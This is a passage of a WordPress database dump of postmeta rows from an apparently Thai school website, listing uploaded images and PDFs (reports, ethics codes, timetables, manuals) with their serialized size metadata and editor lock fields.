(2059,685,'_title_style','field_5d1a0217cf408'),
(2060,686,'_wp_attached_file','2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png'),
(2061,686,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:675;s:6:\"height\";i:675;s:4:\"file\";s:50:\"2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\";s:8:\"filesize\";i:42439;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:50:\"Yellow-Clean-Contact-Us-Instagram-Post-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:24941;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"Yellow-Clean-Contact-Us-Instagram-Post-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8947;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:50:\"Yellow-Clean-Contact-Us-Instagram-Post-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25632;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2063,688,'title_style','default'),
(2064,688,'_title_style','field_5d1a0217cf408'),
(2066,690,'_wp_attached_file','2024/08/ผอ-1-2.png'),
(2067,690,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:561;s:6:\"height\";i:561;s:4:\"file\";s:22:\"2024/08/ผอ-1-2.png\";s:8:\"filesize\";i:318446;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"ผอ-1-2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:84114;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"ผอ-1-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25188;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"ผอ-1-2-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:70587;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2068,469,'_generateblocks_dynamic_css_version','1.9.1'),
(2069,691,'title_style','default'),
(2070,691,'_title_style','field_5d1a0217cf408'),
(2071,692,'title_style','default'),
(2072,692,'_title_style','field_5d1a0217cf408'),
(2073,693,'title_style','default'),
(2074,693,'_title_style','field_5d1a0217cf408'),
(2077,695,'title_style','default'),
(2078,695,'_title_style','field_5d1a0217cf408'),
(2079,696,'title_style','default'),
(2080,696,'_title_style','field_5d1a0217cf408'),
(2081,697,'title_style','default'),
(2082,697,'_title_style','field_5d1a0217cf408'),
(2084,699,'title_style','default'),
(2085,699,'_title_style','field_5d1a0217cf408'),
(2086,700,'_edit_lock','1723126221:1'),
(2087,700,'_edit_last','1'),
(2088,700,'title_style','default'),
(2089,700,'_title_style','field_5d1a0217cf408'),
(2090,701,'title_style','default'),
(2091,701,'_title_style','field_5d1a0217cf408'),
(2092,702,'title_style','default'),
(2093,702,'_title_style','field_5d1a0217cf408'),
(2094,703,'_edit_lock','1723108185:1'),
(2095,704,'_wp_attached_file','2024/08/รายงานผลการปฏิบัติงานประจำปี.pdf'),
(2096,704,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:234557;}'),
(2097,703,'_edit_last','1'),
(2098,703,'title_style','default'),
(2099,703,'_title_style','field_5d1a0217cf408'),
(2100,705,'title_style','default'),
(2101,705,'_title_style','field_5d1a0217cf408'),
(2102,706,'title_style','default'),
(2103,706,'_title_style','field_5d1a0217cf408'),
(2104,707,'title_style','default'),
(2105,707,'_title_style','field_5d1a0217cf408'),
(2106,708,'_edit_lock','1723108088:1'),
(2107,709,'_wp_attached_file','2024/08/การเปิดโอกาสให้เกิดการมีส่วนร่วม.pdf'),
(2108,709,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:1056043;}'),
(2109,708,'_edit_last','1'),
(2110,708,'title_style','default'),
(2111,708,'_title_style','field_5d1a0217cf408'),
(2112,710,'title_style','default'),
(2113,710,'_title_style','field_5d1a0217cf408'),
(2114,711,'title_style','default'),
(2115,711,'_title_style','field_5d1a0217cf408'),
(2116,712,'_edit_lock','1751010276:1'),
(2117,713,'_wp_attached_file','2024/08/แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf'),
(2118,713,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:212032;}'),
(2119,712,'_edit_last','1'),
(2120,712,'title_style','default'),
(2121,712,'_title_style','field_5d1a0217cf408'),
(2122,714,'title_style','default'),
(2123,714,'_title_style','field_5d1a0217cf408'),
(2124,715,'title_style','default'),
(2125,715,'_title_style','field_5d1a0217cf408'),
(2126,716,'_edit_lock','1723112197:1'),
(2127,717,'_wp_attached_file','2024/08/ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ.pdf'),
(2128,717,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:3584101;}'),
(2129,716,'_edit_last','1'),
(2130,716,'title_style','default'),
(2131,716,'_title_style','field_5d1a0217cf408'),
(2132,718,'title_style','default'),
(2133,718,'_title_style','field_5d1a0217cf408'),
(2134,719,'title_style','default'),
(2135,719,'_title_style','field_5d1a0217cf408'),
(2136,720,'_wp_attached_file','2024/08/ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ-1.pdf'),
(2137,720,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:4914217;}'),
(2138,721,'title_style','default'),
(2139,721,'_title_style','field_5d1a0217cf408'),
(2141,723,'_wp_attached_file','2024/08/ย้าย.png'),
(2142,723,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:24:\"2024/08/ย้าย.png\";s:8:\"filesize\";i:6994;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2143,724,'_wp_attached_file','2024/08/ดูเกรด.png'),
(2144,724,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:30:\"2024/08/ดูเกรด.png\";s:8:\"filesize\";i:7398;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2145,725,'_wp_attached_file','2024/08/ห้องประชุม.png'),
(2146,725,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:42:\"2024/08/ห้องประชุม.png\";s:8:\"filesize\";i:11773;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2147,726,'_wp_attached_file','2024/08/SLIP-SSK-1.webp'),
(2148,726,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:120;s:6:\"height\";i:120;s:4:\"file\";s:23:\"2024/08/SLIP-SSK-1.webp\";s:8:\"filesize\";i:1776;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2149,727,'_wp_attached_file','2024/08/smss-ssk1.webp'),
(2150,727,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:120;s:6:\"height\";i:120;s:4:\"file\";s:22:\"2024/08/smss-ssk1.webp\";s:8:\"filesize\";i:1840;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2151,728,'_wp_attached_file','2024/08/admss.webp'),
(2152,728,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:120;s:6:\"height\";i:120;s:4:\"file\";s:18:\"2024/08/admss.webp\";s:8:\"filesize\";i:3152;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2153,729,'_wp_attached_file','2024/08/2-1.png'),
(2154,729,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:15:\"2024/08/2-1.png\";s:8:\"filesize\";i:20392;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"2-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17307;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"2-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8429;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:15:\"2-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12312;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2155,730,'_wp_attached_file','2024/08/5.png'),
(2156,730,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:13:\"2024/08/5.png\";s:8:\"filesize\";i:11294;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:13:\"5-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7495;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:13:\"5-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3581;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:13:\"5-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4761;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2157,731,'_wp_attached_file','2024/08/6.png'),
(2158,731,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:13:\"2024/08/6.png\";s:8:\"filesize\";i:121185;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:13:\"6-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:58570;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:13:\"6-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:20502;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:13:\"6-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:69835;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2159,732,'title_style','default'),
(2160,732,'_title_style','field_5d1a0217cf408'),
(2162,734,'title_style','default'),
(2163,734,'_title_style','field_5d1a0217cf408'),
(2164,735,'title_style','default'),
(2165,735,'_title_style','field_5d1a0217cf408'),
(2166,736,'_wp_attached_file','2024/08/ย้าย-1.png'),
(2167,736,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:26:\"2024/08/ย้าย-1.png\";s:8:\"filesize\";i:6994;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2169,738,'_wp_attached_file','2024/08/ดูเกรด-1.png'),
(2170,738,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:32:\"2024/08/ดูเกรด-1.png\";s:8:\"filesize\";i:7398;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2171,739,'_wp_attached_file','2024/08/ห้องประชุม-1.png'),
(2172,739,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:44:\"2024/08/ห้องประชุม-1.png\";s:8:\"filesize\";i:11773;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2173,740,'title_style','default'),
(2174,740,'_title_style','field_5d1a0217cf408'),
(2175,741,'_edit_lock','1723126785:1'),
(2177,741,'_edit_last','1'),
(2178,741,'title_style','default'),
(2179,741,'_title_style','field_5d1a0217cf408'),
(2180,743,'title_style','default'),
(2181,743,'_title_style','field_5d1a0217cf408'),
(2182,744,'title_style','default'),
(2183,744,'_title_style','field_5d1a0217cf408'),
(2184,745,'title_style','default'),
(2185,745,'_title_style','field_5d1a0217cf408'),
(2187,747,'title_style','default'),
(2188,747,'_title_style','field_5d1a0217cf408'),
(2189,748,'_edit_lock','1723127418:1'),
(2190,749,'_wp_attached_file','2024/08/ตารางเรียน-ตามรางสอน2567.pdf'),
(2191,749,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:472723;}'),
(2192,748,'_edit_last','1'),
(2193,748,'title_style','default'),
(2194,748,'_title_style','field_5d1a0217cf408'),
(2195,750,'title_style','default'),
(2196,750,'_title_style','field_5d1a0217cf408'),
(2197,751,'title_style','default'),
(2198,751,'_title_style','field_5d1a0217cf408'),
(2199,752,'title_style','default'),
(2200,752,'_title_style','field_5d1a0217cf408'),
(2202,754,'_wp_attached_file','2024/08/ตารางเรียน-ตามรางสอน2567-1.pdf'),
(2203,754,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:472723;}'),
(2204,755,'_wp_attached_file','2024/08/ตารางเรียน-ตามรางสอน2567-2.pdf'),
(2205,755,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:472723;}'),
(2206,756,'title_style','default'),
(2207,756,'_title_style','field_5d1a0217cf408'),
(2208,757,'_wp_attached_file','2024/08/1-1.png'),
(2209,757,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:250;s:4:\"file\";s:15:\"2024/08/1-1.png\";s:8:\"filesize\";i:211105;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"1-1-300x94.png\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:39503;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:28865;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"1-1-768x240.png\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:202996;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:15:\"1-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:80514;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2210,758,'_wp_attached_file','2024/08/2-2.png'),
(2211,758,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:250;s:4:\"file\";s:15:\"2024/08/2-2.png\";s:8:\"filesize\";i:254598;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"2-2-300x94.png\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:42013;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"2-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31516;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"2-2-768x240.png\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:221159;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:15:\"2-2-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:89358;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2213,760,'title_style','default'),
(2214,760,'_title_style','field_5d1a0217cf408'),
(2215,761,'title_style','default'),
(2216,761,'_title_style','field_5d1a0217cf408'),
(2218,763,'title_style','default'),
(2219,763,'_title_style','field_5d1a0217cf408'),
(2221,765,'title_style','default'),
(2222,765,'_title_style','field_5d1a0217cf408'),
(2224,767,'_wp_attached_file','2024/08/อำนาจหน้าที่O3.pdf'),
(2225,767,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:76741;}'),
(2226,768,'title_style','default'),
(2227,768,'_title_style','field_5d1a0217cf408'),
(2228,769,'_wp_attached_file','2024/08/O4อำนาจหน้าที่.pdf'),
(2229,769,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:263955;}'),
(2230,770,'title_style','default'),
(2231,770,'_title_style','field_5d1a0217cf408'),
(2232,771,'_edit_lock','1724995224:1'),
(2233,772,'_wp_attached_file','2024/08/011แนวปฏิบัติผู้รับบริการ.pdf'),
(2234,772,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:341206;}'),
(2235,771,'_edit_last','1'),
(2236,771,'title_style','default'),
(2237,771,'_title_style','field_5d1a0217cf408'),
(2238,773,'title_style','default'),
(2239,773,'_title_style','field_5d1a0217cf408'),
(2240,774,'title_style','default'),
(2241,774,'_title_style','field_5d1a0217cf408'),
(2242,775,'title_style','default'),
(2243,775,'_title_style','field_5d1a0217cf408'),
(2244,776,'_edit_lock','1723179351:1'),
(2245,777,'_wp_attached_file','2024/08/012สถิติการให้บริการ.pdf'),
(2246,777,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:271093;}'),
(2247,776,'_edit_last','1'),
(2248,776,'title_style','default'),
(2249,776,'_title_style','field_5d1a0217cf408'),
(2250,778,'title_style','default'),
(2251,778,'_title_style','field_5d1a0217cf408'),
(2252,779,'title_style','default'),
(2253,779,'_title_style','field_5d1a0217cf408'),
(2254,780,'_edit_lock','1751594093:1'),
(2255,781,'_wp_attached_file','2024/08/07แผนพัฒนาหน่วยงาน.pdf'),
(2256,781,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:1281045;}'),
(2257,780,'_edit_last','1'),
(2258,780,'title_style','default'),
(2259,780,'_title_style','field_5d1a0217cf408'),
(2260,782,'title_style','default'),
(2261,782,'_title_style','field_5d1a0217cf408'),
(2262,783,'title_style','default'),
(2263,783,'_title_style','field_5d1a0217cf408'),
(2264,784,'_edit_lock','1751701946:1'),
(2265,785,'_wp_attached_file','2024/08/010คู่มือปฏิบัติงานบุคลกรทางการศึกษา.pdf'),
(2266,785,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:502504;}'),
(2267,784,'_edit_last','1'),
(2268,784,'title_style','default'),
(2269,784,'_title_style','field_5d1a0217cf408'),
(2270,786,'title_style','default'),
(2271,786,'_title_style','field_5d1a0217cf408'),
(2272,787,'_wp_attached_file','2024/08/คู่มือปฏิบัติงานบุคลกรทางการศึกษา.pdf'),
(2273,787,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:502504;}'),
(2274,788,'title_style','default'),
(2275,788,'_title_style','field_5d1a0217cf408'),
(2276,789,'_edit_lock','1723215345:1'),
(2277,790,'_wp_attached_file','2024/08/29-67.png'),
(2278,790,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2024/08/29-67.png\";s:8:\"filesize\";i:4041435;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"29-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:128725;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"29-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1106951;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"29-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48139;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"29-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1227061;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"29-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2193705;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"29-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:120179;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2280,789,'_thumbnail_id','790'),
(2281,789,'_edit_last','1'),
(2282,789,'title_style','default'),
(2283,789,'_title_style','field_5d1a0217cf408'),
(2284,789,'related',''),
(2285,789,'_related','field_603b51c3e183e'),
(2286,791,'title_style','default'),
(2287,791,'_title_style','field_5d1a0217cf408'),
(2288,791,'related',''),
(2289,791,'_related','field_603b51c3e183e'),
(2290,792,'_edit_lock','1723215530:1'),
(2291,793,'_wp_attached_file','2024/08/IMG_8156-scaled.jpg'),
(2292,794,'_wp_attached_file','2024/08/IMG_8189-scaled.jpg'),
(2293,795,'_wp_attached_file','2024/08/IMG_8171-scaled.jpg'),
(2294,796,'_wp_attached_file','2024/08/DSC_1768_0-scaled.jpg'),
(2295,797,'_wp_attached_file','2024/08/DSC_1725_0-scaled.jpg'),
(2296,798,'_wp_attached_file','2024/08/IMG_8160-scaled.jpg'),
